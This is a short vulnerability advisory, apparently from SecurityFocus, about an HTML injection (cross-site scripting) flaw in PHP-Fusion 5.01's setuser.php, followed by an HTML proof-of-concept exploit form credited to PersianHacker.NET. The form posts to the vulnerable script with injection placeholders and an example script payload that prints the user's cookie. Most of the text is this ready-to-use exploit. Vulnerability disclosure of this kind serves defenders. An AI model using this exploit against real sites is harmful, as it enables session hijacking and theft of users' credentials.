source: http://www.securityfocus.com/bid/12853/info

PHP-Fusion is reportedly affected by a HTML injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input passed to the 'setuser.php' script before using it in dynamically generated content.

This vulnerability is reported to affect PHP-Fusion version 5.01, however the vendor reports that the vulnerability might exist in an alteration that is planned for version 5.02. This alteration was recently released to the PHP-Fusion community as a mod for version 5.01.

<html>

<head>
<title>PHP-Fusion v5.01 Exploit</title>
</head>

<body>

<h1>PHP-Fusion v5.01 Html Injection Exploit</h1>


<form method="POST" action="http://www.example.com/setuser.php">
  <b>XSS in register.php:</b><p>
  Username:
  <input type="text" name="user_name" size="48" value="XSS Injection Code"></p>
  <p>
  Password:
  <input type="text" name="user_pass" size="48" value="XSS Injection Code"></p>
  <p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br>
  exmple: <script>document.write(document.cookie)</script></p>
  <p>&nbsp;<input type='submit' name='login' value='RUN!' class='button'></p>
</form>
<p>&nbsp;</p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>

</body>

</html>

